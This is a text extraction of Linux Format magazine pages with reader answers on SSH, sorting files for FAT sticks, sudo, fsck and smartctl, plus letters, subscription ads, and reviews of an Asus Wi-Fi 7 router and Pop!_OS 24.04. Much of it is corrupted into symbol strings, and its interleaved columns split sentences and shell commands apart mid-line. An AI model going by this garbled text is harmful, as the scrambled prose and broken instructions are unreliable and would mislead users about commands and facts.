*"00$")&("1%&0o,2 +$"1*,/" +! !!/"00n21&1!,"0+}1%2/1o,2 %",3" ,**+!!,"0+}1 ,-6
information by using ssh in a terminal can also add a Cipher line if you need +61%&+$o +01"!n&1 /"1"0Y)"&+
4&1%3"/,0",21-21p to specify a cipher. The + before the 2001& (+*"!634%& % ,+1&+01%"
$ ssh -v user@nas name means this is added to the list ,21-21,#1%" ls -bR1 albums  ,**+!o
To see which key algorithms it ,#02--,/1"!)$,/&1%*0,/ &-%"/0 %"0- "0/""0 -"!&+1%"Y)"+*"0n
supports, run: &+01"!,#/"-) &+$&1o 211%"!&/" 1,/&"0/")&01"!0%"!&+$0
$ ssh -Q HostKeyAlgorithms "+!&+$4&1% ,),+0n+!1%,0"0- "0/"
If you have SSH terminal access to the
NAS, you can use the same command to
Q Random sounds
I am trying to copy a collection
+,1"0 -"!o
#  ,2)!'201$"1 cp -R albums usbstick
see which ciphers it supports. Then you ,#;01,01& (&+)-%"1& ) 1, ,-61%"Y)"0&+)-%"1& ),/!"/n1%1
4,2)!0,)3"&1n21cp4,+}1!,&1o /"!
"3"/61%&+$  ,2)!Y+!,21&1o
Sean Moss

A The cp command combined

4&1%0%"))4&)! /!04&)) ,-6&+
alphabetical order, because the shell sorts
wildcard resolutions, so the following will
work for a single directory:
$ cp *.mp3 usbstick
For a hierarchy, you can use Y+! with
sort to produce a sorted list:
$ find -name ‘*.mp3’ | sort
Then pass this list to cp. The list may be
too long to copy in one go, so use xargs to
break it into manageable chunks:
$ find -name ‘*.mp3’ | sort | xargs cp -t
SSH needs compatible key support on both sides of the connection, unless you want to see messages like this. usbstick

www.techradar.com/pro/linux April 2025 LXF326 11

ANSWERS

%&04&)) ,-61%"Y)"0&+1%"0,/1"!
order, copying as many in one go as your
0%"))}0 ,**+!v)&+")&*&104&))%+!)"o
This leaves the problem of spaces
and other reserved characters in the
Y)"+*"0n4%& % +"0,/1"!620&+$
+2))61"1,!")&*&11%"Y)"0&+Y+!}0 output
and telling xargs1,"5-" 11%&0&+-21n
which is simpler to do than to describe:
$ find -name ‘*.mp3’ -print0 | sort | xargs
-0 cp -t usbstick
The order of the arguments given
to xargs is important. Those before the
command apply to xargs, those after are
passed to the command.
However, this may not completely solve
your problem, due to the way the FAT
Y)"0601"*4,/(0q01& (0$"+"/))620"
1%&0&+!,40Y)"0601"*o3"+&#6,24/&1" Synchronising Samsung Calendar with Thunderbird works if you use the Google Calendar as an intermediary.
1%"Y)"0&+1%",/!"/6,24+1n1%"6*6
still be jumbled on the stick. The solution &+!,40"/n 20"!MyPhoneExplorer is able to sync with ,,$)")"+!/n and
is a utility called fatsort. If it is not in your 1,06+ %/,+&0"1%"Thunderbird )"+!/ the *02+$)"+!/is able to sync with
!&01/,}0/"-,0n$"1&1#/,*https://fatsort. 4&1%*6*02+$+!/,&!-%,+" 1%1o%"Y/0101"-&01,$,1%" ,2+10
0,2/ "#,/$"o&,š. At its simplest, run: (Samsung Calendar). MyPhoneExplorer section of the phone settings. Go to Add
$ fatsort -a /dev/usbstick &+&+!,4&+1"$/1"04&1%Thunderbird Account, select Google and log into your
You give fatsort the device node, not /"))6+& ")6n21)1%,2$% %3"&+01))"! Google account, then you can enable the
the mount point. The device should not be MyPhoneExplorer,+&+25n %3" Sync Calendar option.
mounted when you run this. The man page +,1""+)"1,!,1%"0*"o1 Once you can see your calendar entries
%0,-1&,+0#,/Y+"v12+&+$1%"/"02)10o #/,**6-%,+"&006+ %/,+&0"!4&1% appearing in the Google app or web page,
Your combination of ls and cp failed MyPhoneExplorer’s,4+ )"+!/0601"*n Y/"2-%2+!"/&/! and go to File > New >
because you use $(...), not <(...), to pass 21MyPhoneExplorer&+&+25&0+,1 )"+!/o)& (+%""14,/(+!"51n
the output of one command to another. 06+ %/,+&0"!4&1%Thunderbird. then type in your Google email address.
Normann Aa Nielsen ,2}))0""1%"202)21%,/&01&,+/".2"01

Q It’s a date from Google, then the calendar is added.

/" "+1)6" *"0,++,6"!4&1%
&+!,401%1  %+$"!1,&+25&+1
A MyPhoneExplorer is a Windows
-/,$/*q1%"/"&0+,+1&3"&+25
It may take a short while for the sync
to take place after each of these stages,
:9o;/2++&+$><v&1o"))6n*,01 version. The instructions for running it on but then your Samsung and %2+!"/&/!
,#*6!&)620"&00,)21")602#Y &"+1)6 &+25&+1061,20"WINE, the Windows calendars should remain in step, with full
,3"/"!ƒ)0,1%+(01,$,,!!3& "#/,* API emulator. This means it is most likely read/write access on both.
/1& )"0&+LXFx*,01--/" &1"!j„21n,# trying to communicate with a Windows
,2/0"n1%"/"&0*&+,/&002"1%1 !,+}1
(+,4%,41,0,)3"o
installation of %2+!"/&/!nwith the
inevitable lack of success.
Q Ro, ro, ro the disk
%3"/" 2//&+$-/,)"*2+!"/
*20&+$Thunderbird0*&) Now the bad news is out of the way, it &+25&+1n&+1%11%"!&0(&002!!"+)6
)&"+1,+&+25ƒ4,/(&+$+& ")6„n21&+1%" is time for some good news. %2+!"/&/! /"!v,+)6n0, }*2+)"1,!,+61%&+$

A QUICK REFERENCE TO… SHELL WILDCARDS

Wildcards are used to match 1%"4&)! /!"5-/"00&,+4&1% you need */*.txt to match the ,1%,#1%"0")&01))Y)"0
*2)1&-)"Y)"0&+0%"))o )&01,#*1 %&+$Y)"0n1%"+ latter. Some shells, such as starting with a, b, c or d. What
The two main wildcards calls the command, so it runs: ZShell, use ** to match any %--"+0&#6,2%3"Y)"
are * and ? . * matches $ ls in.txt out.txt character, including directory with a *, [ or ? in the name?
any number of characters, The command has no separators, so you can list 1}0+,1202))6 )"3"/&!"1,
so *.jpg &0"5-+!"!6 &!"1%14&)! /!%0 Y)"0&+1%" 2//"+1!&/" 1,/6 do this but it may be beyond
1%"0%"))1,)&01,#))Y)"0 been used. The other and those below it with: your control. The answer
4&1%o'-$"51"+0&,+o 1&0 commonly used wildcard $ ls **/*.jpg &01,|"0 -"}1%"4&)! /!
important to understand is ? n4%& %*1 %"0+6 Shell wildcards (or with a backslash. If you run
1%11%&0"5-+0&,+&0!,+" 0&+$)" %/ 1"/p a?c.txt globbing) are not the same as the following, the shell will
by the shell before passing matches abc.txt or aBc.txt, /"$2)/"5-/"00&,+0n)1%,2$% ignore the wildcard and ls will
1%")&01,#Y)"01,4%1"3"/ but not ac.txt or abbc.txt. some aspects are similar. The 1/61,0%,4Y)" ))"!*.txt,
,**+!6,2}3" ))"!o # One character not matched shell also accepts ranges of ƒ)1%,2$% /"1&+$02 %Y)"
6,2%3"14,Y)"0 ))"! by these is the directory characters using brackets: &+1%"Y/01-) "4,2)!+,1"
in.txt and out.txtn+!/2+ separator / . *.txt matches $ ls [abcd]* the best idea you ever had):
$ ls *.txt , the shell replaces abc.txt21+,1abc/def.txtq $ ls [a-d]* $ ls \*.txt

12 LXF326 April 2025 www.linuxformat.com

 ANSWERS

-004,/!o,2+""!1,!" &!""5 1)6

what you want userA to be able to do as
20"/n1%"+ ,+Y$2/"02!, to allow them
to run those, and only those, commands.
6!"#2)1n02!, allows any user in a
-/1& 2)/$/,2-1,"5" 21"+6 ,**+!n
using their password. Traditionally, this
group was called wheeln212+12v0"!
distros use admin, and some use the
sudo group. You can see which your distro
uses in /etc/sudoerso%&0&01%"Y)"1%1
,+Y$2/"002!, access, look for a line like:
%wheel ALL=(ALL:ALL) ALL
("02/"20"/&0&+1%&0$/,2-n
then add permissions to run commands:
userA ALL = (userB) command1,
command2,...
This means userA can only use 02!,
to run the given commands, and only as
Sudo is the right tool for deciding which users can do what with other accounts, even if the config file is complex. 20"/o,2*201$&3"1%"#2))-1%1," %
command. This does means that userA
1%1+""!01,-"/#,/*!&0(,-"/1&,+0o estimate of the time the test will take. has to run each command as the following
%&0%0%--"+"!2+!"/!&##"/"+1 After that, you can see the results with: and give the password each time:
3"/0&,+0,#&+1n+,4 2//"+1)63:9o;n+! $ smartctl --log selftest $ sudo -u userB command
,+!&##"/"+10š!&0(0x 2//"+1)69 If you are feeling impatient, replace ,2 +3,&!"51/16-&+$60"11&+$
*02+$A?8)20"4&1% ),+$ with short for the test type, although up shell aliases. You can reduce the
=;? -/1&1&,+ƒ<#2))„*,2+1"! 1%&04&))+,1"0"5%201&3"o +2*"/,#-004,/!/".2"01060"11&+$
on š,,1š"Yn+!0" ,+!9n888 "51< 1"010 +"!,+",+/2++&+$0601"*q timestamp_timeout to the number of
-/1&1&,+ƒ%)##2))„*,2+1"!,+/,,1 for there is no need to boot from live media. *&+21"0"14""+-/,*-10o01)6n))
Y)"0601"*o%"1/& (1,0,)3"1%"&002"&0n As it appears that the drive may be changes to /etc/sudoers should be made
2+!"/&+&1/*#0n1,/2+1%" ,**+!p poorly, we advise taking an immediate by running 3&02!,oThis makes a copy of
fsck -yv [device] backup, and keeping it up do date. 1%"Y)"+!),!0&1&+1,6,2/-/"#"//"!
%&0/"12/+0*"00$"0,21,/-%+"! Another possibility is that some process is editor – by checking the $EDITOR
Y)"0+!0,*"+,!""&+$ ,//2-1"!+! /0%&+$4&1%,21 ),0&+$Y)"0o%"0601"* "+3&/,+*"+13/&)"o#1"/6,2"5&11%"
/"-&/"!o 116-& ))6%--"+0&#1%"%0 log/journal should help in detecting this. editor, 3&02!, %" (01%11%"03"!Y)"
""+)"#1,+!2/&+$1%"+&$%1n,/&#1/6&+$1, is valid before replacing /etc/sudoers
4("&1#/,*0,*"0,/1,#020-"+!o
Matt Stone
Q Uprooted
+""!1,/"01/& 120"/}0&)&16
with it. This avoids, or at least reduces,
the chances of you locking yourself out
1,20"su1," ,*"/,,1o&1%14,20"/0n ,#02!, with an erroneous entry.
A This looks suspiciously like a failing 20"/+!20"/n +""!20"/+,11,%3"
!&0(o,,(11%""+1/6#,// in your -"/*&00&,+1,20"1%" ,**+! su - to GET HELP NOW!
/etc/fstab – does it contain the option: 04&1 %1,1%"/,,120"/o0"/0%,2)!,+)6
errors=remount-ro ")),4"!1,20" su - 1,04&1 %1,20"/}0 We’d love to try to answer any questions
%&00"101%"Y)"0601"*1,"/"!v,+)6  ,2+1o +""!1,"+02/"20"/%0 you send to [email protected], 20 /&-1&,+0p for magazine issues email %")-ª*6*$7&+"o ,o2(
when an error occurs, to prevent more )&*&1"! "00+! ++,1" ,*"/,,1n no matter what the level. We’ve all been
damage. The longer the system runs, the 21 +01&)) "0020"/}0 ,2+1o stuck before, so don’t be shy. However, we’re
more chance of a disk operation hitting Harry Dean only human (although many suspect Neil is
+"//,/v-/,+"-/1,#1%"!&0(n%"+ "1%" an escaped sysadmin), so it’s important that
apparent failures after an overnight run.
You can work around this by rebooting and
A %"/"&00& Z4&+1%&0-/, "00n
&+1%1&#20"/ +" ,*"/,,1n
you include as much information as you can.
If something works on one distro but not
running fsck, but there is no real cure for a 4%1&01,01,-20"/04&1 %&+$1,20"/}0 ­ĆČijéÐĨƨǎijÐÿÿǎķĬƧǏ?ãǎőČķǎäÐijǎ­ĆǎÐĨĨČĨǎąÐĬĬ­äÐƨǎ
failing disk other than replacement. account, then using su to become root? please tell us the exact message and
You could try running e2fsck from a The solution to doing things this way is precisely what you did to invoke it.
live distro – do not try to fsck a mounted 1, ,+1/,) "001,1%"/,,1-004,/!o If you have, or suspect, a hardware
Y)"0601"*o &/01)6/2+&14&1%p 002*&+$20"/+!20"//"14, problem, let us know about the hardware.
$ e2fsck -nf /dev/sda2 #(or wherever different people, only give the root Consider installing hardinfo or lshw.
your drive is) -004,/!1,20"/o%146n1%",1%"/ ƒéÐĬÐǏĥĨČäĨ­ąĬǎÿìĬijǎijéÐǎé­ĨÌŋ­ĨÐǎČĆǎőČķĨǎ
The -n option tells fsck to scan without user can log into their account but not use machine, so send us their output. If you’re
11"*-1&+$/"-&/0q-f forces a scan even if su" 20"1%"6!,+}1%3"1%"-004,/!o unwilling, or unable, to install these, run the
1%"Y)"0601"*--"/0 )"+o,2 +)0, ,4"3"/n1%&0&0+}13"/60" 2/"--/, % following commands in a root terminal and
use smartctl to run a health check – you as it means giving out the root password send us the system.txt file, too:
*6+""!1,"+)"&+1%" p and relying on others to not reveal it. uname -a > system.txt
$ smartctl --test long /dev/sda 2!, is designed to provide controlled lspci >> system.txt
You run smartctl on the whole disk,  "001,+,1%"/20"/}0# &)&1&"04&1%,21 lspci -vv >> system.txt
not individual partitions. This gives an /"3")&+$1%"/,,1n,/+6,1%"/20"/}0n

www.techradar.com/pro/linux April 2025 LXF326 13

Mailserver
MAILSERVER

WRITE TO US My code!
I just learnt that there is an article in the February
Do you have a 2025 Code Academy about my program Cosmic
burning Linux-
Invaders. ,4 + $"1-/&+1"! ,-6l 1}0+,1
related issue
available to order on the site.
that you want to
discuss? Write to Mark Buckwell
us at Linux Format,
Future Publishing, Neil says…
xķ­őǏ<ČķĬÐƨǎ The issue in question, LXF324, is now available to order
ƒéÐǏ
ąÅķĨőƨǎ from www.magazinesdirect.com, but we’ve put a copy
­ijéƨǎ
ūǎū‡
ǎČĨǎ in the post for you. We hope you enjoy how we’re
email letters@ presenting the project to 21st-century coders! Ideally you want the Linux kernel to have support, but you can install
linuxformat.com. your own drivers; just be prepared to reinstall with kernel updates.
,,,)!l
I have an old system and was wondering if it’s worth an Athlon II of some description. The good news is they
-211&+$&+25,+1%"/"l 1}0#/,*/,2+!:898+!%0 are at least 64-bit and support SSE4 and hardware
+3&!& <<84&1%9 n!2)v ,/" virtualisation, which means they should run any
+!@ o,2)!&1"0"/3"!"11"/4&1%&+25 modern distro with no technical issues – even if they
,+&1l }))*&+)620"&1#,/,22"n"0060+!#"4 didn’t, there are 32-bit options, such as Bodhi Legacy.
)&$%1$*"00*60" ,+!/6o 120"!1,%3" The same goes for the GT 440 card – it’s still
Windows 7 and it didn’t perform very well. supported and you should find decent out-of-the-box
Peter Vance performance for desktop use. It has the same sort
,#;-"/#,/*+ "01%" +1") >;8&+1"$/1"!
Neil says… graphics. Not sugar coating it, these days that’s pretty
The Nvidia GT 440 came out in 2011 and was an entry- poor, but good enough for basic desktop acceleration
)"3") 1%102--,/10&/" 19:#"12/"0o ,&+$,## and playing 2010-era games at lower resolutions. The
that, I’d guess the processor you have is also entry- one thing you don’t mention is the motherboard, audio
level, something like the dual-core Intel Core i3 540 or or network interface. These last two tend to cause
hiccups on older hardware, but usually, if you can look
Cosmic Invaders
up the chipset code, you can track down a Linux driver.
was released as a
coding book back
ìĆǎūųŲŮƨǎ­ĆÌǎijéÐǎ Not secure
code has since been I worry about security. I currently use Windows and it’s
ķĥÿČ­ÌÐÌǎijČǎ7ìij<ķÅǎ clear that the OS belongs to a worldwide-known and
for all to enjoy.
one of the richest American companies, Microsoft.
214%1,21&+25l ,4 + "02/" 4&))$"1
-/,3&!"!4&1%0" 2/&162-!1"01%"+"51!6n,/&#
2-!1"0/"#/"",#*)4/"l %3"#"")&+$1%1
there are hundreds of various distros run by hobbyists
who can do whatever they want with their systems.
Why do you trust and keep using these distros,
"0-" &))6&#*,01,#1%"*/"#/"",# %/$"l
Trevor Smith

Neil says…
This is a great question and a valid concern that comes
up a lot, quite often in the form of how can open source
Helpdex

14 LXF326 April 2025 www.linuxformat.com

 MAILSERVER

LETTER OF THE MONTH

Support me
I think it would be very useful if you guys outlined the sellers of
&+25 ,*-21"/0o+&*-,/1+1-/1,#02 %!"0 /&-1&,+&0
,**"+1,+1%".2)&16,#1%"&/1" %02--,/1o ,/"5*-)"n }3"
,2$%10&5 ,*-21"/0#/,*601"*?>,3"/1%")01986"/0o 
%3"+,1& "!1%11%".2)&16,#1%"&/1" %02--,/1%0!&*&+&0%"!
substantially recently. They no longer have phone support, and it
can take a week or more to get an answer from submitting a ticket. I
¡ČķǎÆ­ĆǎĬķÅĬÆĨìÅÐǎijČǎ‡ÅķĆijķǎvĨČǎãČĨǎãĨÐÐǎ­ĆÌǎäÐijǎÐĆijÐĨĥĨìĬÐƽÿÐŊÐÿǎķĥÌ­ijÐĬƧǎ know you’re primarily a software magazine, but you do cover some
%/!4/"n)&("1%"&,/!0o
be as secure as closed source proprietary software? Rob Solomon
It’s effectively security in the open versus security
through obscurity. Is a system more secure being open Neil says…
to scrutiny by all, or by locking up the source and This is a great suggestion and our sister website TechRadar Pro
hoping you can plug holes as it becomes apparent does something similar in its service reviews – it checks out the
they’re being exploited in the wild? available support options and pings the support team an elementary
Open source advocates have always championed .2"01&,+1,0""1%".2)&16+!0-""!,#1%"/"-)6o ,4"3"/n 0%,2)!
&10"&+$1%")"014,/01,-1&,+n+!%3&+$$&+1 point out that these things can be very variable, depending on
corporations employing the best security experts, individuals, time of day, time of year, and so on. While it would be
checking and improving this code leads to better hard to test hardware replacement issues, we’ll do our best. We
security outcomes. Interestingly, Microsoft has been '201+""!1, ,+3&+ "02--)&"/01, 12))60"+!202+&10j
going through a series of security changes called the
Secure Future Initiative, opening up its security policy
#1"/!&001/,205 %+$"% (6011"v ("!
attacker in 2023. Part of the issue it highlighted was
that it was prioritising speed to market over security
development. Make of that what you will.
%"# 1&01%1)"!&+$"+1"/-/&0"020""! 1
ƒ"+1n "!,/„+!2+12n+! ,,$)"+!"3"+
Microsoft are key Linux kernel contributors. When they
get security and feature updates, so do you. You’re
right, if you install some obscure one-man-band distro,
you probably won’t get updates as quickly, but if you’re
concerned about security, why would you do that?

Wine, wine, wine The Dell XPS might be no more but at least they sent us review units!
While tools like Wine and Proton are helpful,
compatibility can be frustrating, usually with less
,**,+,/20&+"00v0-" &#& 0,#14/"o ,/"5*-)"n suppose to troubleshoot Wine issues and set things
0,*"--)& 1&,+0 /0%4&1%,21"5-)+1&,+n4%&)" up for specific scenarios.
others struggle with performance or lack a feature Alex Carter
+""!o }!),3"1,0"" ,*-/"%"+0&3"$2&!"1%1
compares different approaches, such as fine-tuning Neil says…
Wine configurations, using virtualisation tools like We’ve looked at Wine (LXF314, LXF284, LXF238) but v10 is
VirtualBox,/n+!"5-),/&+$+"4"/0,)21&,+0 out now… Bottles is new, so we should check that out,
)&("Bottles. I’d be interested in seeing how you are while Proton (LXF314, LXF266) is games-orientated.
[email protected]

www.techradar.com/pro/linux April 2025 LXF326 15

SUBSCRIBE Save money today!

LINUX FORMAT MAGAZINE

SAVE 5O%
*

www.magazinesdirect.com
/LIN/DH43Z
Call 0330 333 1113
and quote DH43Z

NEW !
cess to
Digital ac
es when
130+ issu
ribe
you subsc
to print!**

16 LXF326 April 2025 www.linuxformat.com

 Save money today! SUBSCRIBE
OUTSIDE
THE UK?65
Turn to pag
e
reat
for more g er
sub scrib
NEW: *-/,3"!!&$&1)
deals!  (v&002" "00j**
Get instant access
,+6,2//,40"/n,/
+!/,&!+!--)"
&!"3& "0 (
1,&002"9@9ƒ/ %
:89<„4&1%9n8880,#
121,/&)0n&+1"/3&"40n
features and reviews.

CHOOSE YOUR PACKAGE!

Keep your subscription rolling!
Subscribe today and save 50%!* + All-new digital access**

PRINT EDITION DIGITAL EDITION

SAVE!

50 %*

Only Only
£21.09 for 6 months
£22.71 for 6 months
6 months of Linux Format >*,+1%0,#!&$&1)
!")&3"/"!#,/^:9o8Aj Linux Format #,/^::o?9j

Terms and conditions: Offer closes 1st September 2025o)"0")),42-1,>4""(0#,/1%"!")&3"/6,#6,2/Y/01020 /&-1&,+&002"ƒ2-1,@4""(0,3"/0"0„o

%"#2))020 /&-1&,+/1"&+ )2!"0-,01$"+!- ($&+$o§3&+$0/"0"!,+1%" ,3"/-/& "o6*"+1&0+,+v/"#2+!)"#1"/1%"9<v!6 + "))1&,+
-"/&,!o§§ "001,1%"!&$&1))&//64&))"+!4&1%6,2/020 /&-1&,+,+-/&+1o ,/!&$&1)020 /&-1&,+n,+ "1"/*&+1"!6,2,+)6(""-1%"&002"06,2%3"-&!
#,/2-1,1%1-,&+1o ,/#2))1"/*0+! ,+!&1&,+0n3&0&1444o*$7&+"0!&/" 1o ,*š1"/*0o ,/"+.2&/&"0+!,3"/0"0/1"0-)"0" ))p<<ƒ8„;;8;;;999;o
&+"0/",-"+,+!6v /&!6@p;8*v?-*n12/!698*v;-*1&*"ƒ"5 )2!&+$+(%,)&!60„,/"*&)p%")-ª*$7&+"0!&/" 1o ,*o
))01,8;;8+2*"/04&))" %/$"!1+,*,/"1%++1&,+))+!)&+" ))n+!*6"&+ )2!"!&+6,2/-%,+"-/,3&!"/}0 ))2+!)"o

www.techradar.com/pro/linux April 2025 LXF326 17

YOUR DIGITAL ISSUE ACCESS
Linux Format print subscribers can now access digital back
issues two ways!* Who’s a lucky bunch of readers?!
As a big thank you for subscribing to Linux
GET YOU
ACCESS R
Format Print Edition, we’ve always offered
N
& SUBSC OW
!&$&1) "001,-01&002"0o 10""*0%"
Management thought it was a good idea and has RIBE
on page
rolled out a new system using Pocketmags ! 16
This means there are now two ways of
accessing LXF  (&002"0#,/020 /&"/0o%"
new Pocketmags service goes back to March
2014, including over 140 full issues, while our
older PDF archive goes back to LXF66 (a crazy
8-bit busting 256-plus issues), though issues
before LXF120%3"%! ,3"/0+!!001/&--"!o
"}3",21)&+"!%,41, "00,1%"),4o+',6j
§"/*0+! ,+!&1&,+0--)6x0""-$"9?#,/#2))!"1&)0o

FANCY NEW POCKETMAGS

Activate your access Create an account Activate your sub

1 "!1, www.magazinesdirect. 2 Enter the email that was used 3 On the Activate A Subscription
com/digital-instructions/ and click the 1, /"1"1%"020 /&-1&,+o,2}))" page, select Linux Format from the pull-
Start Reading link that’ll transfer you prompted to create a Pocketmags down menu and click on Go To Activation
1,1%", ("1*$0 1&31&,+-$"o  ,2+10,6,2 + "001%")&//6o $"o")" 1&//6x%--6/,40&+$j

THE CLASSIC LXF PDF ARCHIVE

DON’T MISS
!
+ )2!"0=6"/
0
of Linux User
&
Developer
issues

Head to Linux Format Use your subs number Access your issues
1 ,2%"/!1%"*+x/,40"1, 2 Log in using your subscriber 3 Use the issue drop-down menu
www.linuxformat.com/archives using +2*"/+!02/+*"o,2 +#&+! 1, "00-01+! 2//"+1&002"0o,2
6,2/#3,2/&1"4"/,40"/o%"/"&1 1%"+2*"/,3"6,2/+*"+! +)0,0"/ %621%,/+!("64,/!
06020 /&"/0p)& ( "/"n!,'2011%1o !!/"00,+1%"!!/"00)")o ,//1& )"16-"0o

Visit www.magazinesdirect.com/linux-format
18 LXF326 April 2025 www.linuxformat.com
 REVIEWS
Asus ZenWiFi BT8
Brandon Hill finally thinks this is a worthy Wi-Fi 7 router.
he ZenWiFi BT8 shares its design language
SPECS
Wi-Fi: Wi-Fi 7
T with the more expensive ZenWiFi BT10. In
fact, the two mesh router systems share the
(802.11be) same exterior dimensions. The outside is finished in
Bands: *114%&1"n+!1%"-)&+"01%"1& 0%,2)!)),41%"
2.4GHz: 2x2, wireless nodes to fade into the background wherever
688Mb/s you place them in your home.
5GHz: 3x3, At least when looking at the nodes, the primary
4,323Mb/s differentiator between the ZenWiFi BT8 and the
6GHz: 3x3, ZenWiFi BT10 is the port arrangement on the back.
8,643Mb/s The ZenWiFi BT8 provides a 2.5G port for WAN/LAN
Speed: and another 2.5G port for LAN – the ZenWiFi BT10
13,654Mb/s provides 10G for both. The ZenWiFi BT8 also provides
CPU: TBC two 1G ports for LAN with a USB 3.2 port.
Mem: 1GB RAM, The setup is straightforward, as is usually the case
128GB flash with Asus routers. Once the physical wired connections
Ports: 2x are made, direct your web browser to asusrouter.com.
2.5Gb/s WAN/ After clicking through a couple of pages filled with
LAN, 2x 1Gb/s, 4))0,#1"51!"+,1&+$-/&3 61"/*0n6,2}/")),4"! A consumer-friendly white box will look smashing in your living room.
1x USB 3.2 1, /"1"0"-/1" 0#,/" %4&/")"00+!+!
Support: Mesh, separate IoT network. Then create a new administrator (1,950Mb/s) and 25-foot (718Mb/s) distances. It was a
beamforming, login and password. At this point, any additional mesh mixed bag on the 5GHz band, where it fell to last place
Size: 159 x 72 units can be added. at six feet, but placed second at 25 feet. The ZenWiFi
x 186mm The ZenWiFi BT8 supports wired and wireless BT8 put on another strong showing on the 2.4GHz
backhaul. If your home is already wired up, you can band with congested traffic, taking first place at six
leverage the wired backhaul using the 2.5G LAN port feet (99Mb/s) and 25 feet (60Mb/s).
on the back of each node. If you go the wireless route, Ping times were consistently in the 3ms to 5ms
the ZenWiFi BT8 uses MLO to bond the 2.4GHz, range for the ZenWiFi BT8 on the 6GHz and 5GHz
= 7+!> 7+!0&+1,0&+$)")&+("14""+1%" bands in our congested and uncongested testing.
router and satellites. These are excellent options. However, the 2.4GHz band tests saw ping times hover
between 7ms and 13ms.
Net worth The Asus ZenWiFi BT8 is a great value router for
020}0"5 "))"+1AsusWRT 5.0 software platform anyone looking to upgrade an ageing Wi-Fi 5 or older
offers a wealth of configuration options and features network to the performance and reliability afforded
that you can explore. The Network Map serves as 6&v &?o +# 1n&1}0/"*/()"3)2"#,/&v &?
1%"%,*"-$"#,/1%""+& &@n+!&1$&3"0 mesh router that cracks the 2,000Mb/s mark on the
broad overview of your network, including internet > 7+!o")0, +}1!&0 ,2+11%"AiProtection
connection status, WPA security level, CPU core 02&1"1%1}0,##"/"!#/"",# %/$"n4%&)"susWRT
utilisation, RAM usage, active Ethernet ports, USB =o8continues to be one of the most thorough and
-,/101120n+!&"0%01120o customisable software platforms available in the
020!,"0+}1 %/$"#,/!!&1&,+)#"12/"04%"+ %,*"/,21"/*/("1o
companies like Netgear, Eero and TP-Link try to push
their paid-for subscription services in order to unlock
certain features or security suites.
VERDICT
In the 6GHz iPerf3 uncongested tests at six feet, DEVELOPER: Asus
1%""+& &@02/-00"!:n888š0o 1 ,2)!+}1 WEB: www.asus.com
quite keep up with the ZenWiFi BT10, though, which PRICE: £250
1,--"!)) ,*-"1&1,/01:n>>?š0o
Things were a bit closer between the two Asus FEATURES 9/10 EASE OF USE 9/10
siblings in the 5GHz iPerf3 test. The performance at PERFORMANCE 9/10 VALUE 7/10
0&5#""140+"/)6&!"+1& )n4&1%1%""+& &@
hitting 1,297Mb/s and the ZenWiFi BT10 achieving Asus offers a compelling tri-node, tri-band Wi-Fi 7 router
CREDIT: Asus

9n:A;š0o%"" ,>=/,1,,(1,-%,+,2/01 that while still expensive at least justifies the cost.
0&5#""119n=;8š0o
Moving to our congested testing regimen, the Rating 8/10
ZenWiFi BT8 slipped into second place at both six-foot

www.techradar.com/pro/linux April 2025 LXF326 19

REVIEWS Linux distribution

Pop!_OS 24.04 Alpha 5

Nate Drake picks apart System76’s pet distro, based on
Ubuntu. Does Pop!_OS hit with a bang or a whimper?
ost Linux users are
IN BRIEF
Typically, we
M #*&)&/4&1% ,*-21"/
manufacturer System76,
don’t review which has achieved fame for selling
alpha builds brand new notebooks and desktop
because they computers with Linux pre-installed.
can be buggy. During the order process, buyers
Still, Pop!_OS’s are offered a choice of Ubuntu or
COSMIC System76’s own PoP!_OS. It stands
desktop is much apart from most other Linux OSes as
flashier than it’s not developed by the community,
stock Gnome. although coders can contribute to the
Native apps source code on GitHub.
such as Store The distro follows the same release
make software cycle as Ubuntu, and is based on the
installation latest release (in this case, Ubuntu
simple. 24.04 LTS). This alpha build features Setup allows you use the same password to both log in and decrypt the hard
the latest iteration of the Pop!_OS drive, though we don’t recommend it.
COSMIC desktop environment. This
SPECS has a similar layout to Gnome but is coded in Rust. Utilities. You can also choose Add Group, if you wish.
CPU: 1GHz After downloading the 2.6GB ISO, we attempted We did this to create a Games category.
Mem: 1,,,1&1&+,2/3&/12)* %&+",+)61,"+ ,2+1"/+ Next, we launched the COSMIC Store, which seems
4GB (8GB error relating to the Wayland compositor. We were to be modelled on Gnome’s Software. Users are
recommended) )"1,/"0,)3"1%"&002"6"+)&+$ *,!"+!; presented with an Editor’s Choice of useful apps. Other
HDD: 20GB Acceleration in the VirtualBox settings. categories include popular apps and those specifically
Builds: Upon loading the live environment, the Pop!_OS made for COSMIC. The latter includes Tweaks, which
x86_64x custom installer launched automatically. This is very operates in a similar way to the Gnome Tweaks tool,
intuitive, offering simple options like system language, enabling users to customise COSMIC further.
keyboard layout, drive selection and account creation. After installing this (via Flathub), we downloaded
Drive encryption is supported. By default, this is KPatience and KHangman to have some games to add
with the same password as for your user account, but to our recently created group. After searching for both
you can (and probably should) set a separate one. programs in Applications, we were able to drag and
Once these options were chosen, the setup drop the launch icons into the Groups folder.
assistant began partitioning the drive, only to freeze COSMIC offers six alternative wallpapers, all with a
18o"3"/1%")"00n4%"+4"/"01/1"!1%"3&/12) similar space theme. This isn’t the only sci-fi aspect of
machine, we were prompted for our login password, the OS, as windows have a thin blue bezel with a very
0,&10""*"!1%"&+01))4,/("!o minimal scroll bar. As with Gnome, you can use Alt+Tab
When the desktop first loads, it’s easy to see the to cycle through open windows. However, this is done
nods to its Gnome roots. Workspaces and applications in the order that the windows are opened, not by the
are accessible via the top-left of the screen. There’s ones most recently used.
also a dock along the bottom with launchers for
popular apps like Firefox and COSMIC’s own text editor.
We were disappointed to see, however, that no tooltips
VERDICT
displayed when we hovered over these, forcing us to DEVELOPER: System76
work out what each option did through trial and error. WEB: https://pop.system76.com
System76 has very detailed online documentation LICENCE: 3;o8
on how to set up and use the distro. This includes
recommended system specs (see side box). Upon FEATURES 8/10 EASE OF USE 8/10
launching System Monitor, we noted that with no other PERFORMANCE 6/10 DOCUMENTATION 8/10
apps open, Pop!_OS consumed 1.8GB of virtual RAM
+!3"/6/"0-" 1)"8o;,#/"0,2/ "0o%" Despite teething troubles, Pop!_OS has an excellent setup
install footprint was also very light at just over 7GB. and desktop. We particularly enjoy being able to group apps.
When we launched System Monitor, we discovered
that the bottom of the Applications grid contains Rating 8/10
various categories (called groups) such as Office and

20 LXF326 April 2025 www.linuxformat.com

 Linux distribution REVIEWS

Siduction 2024.1.0
Nate Drake has been hobnobbing with Siduction’s developers to
inform you about all this Debian-based distro has to offer.
ike MakuluLinux (see p.22),
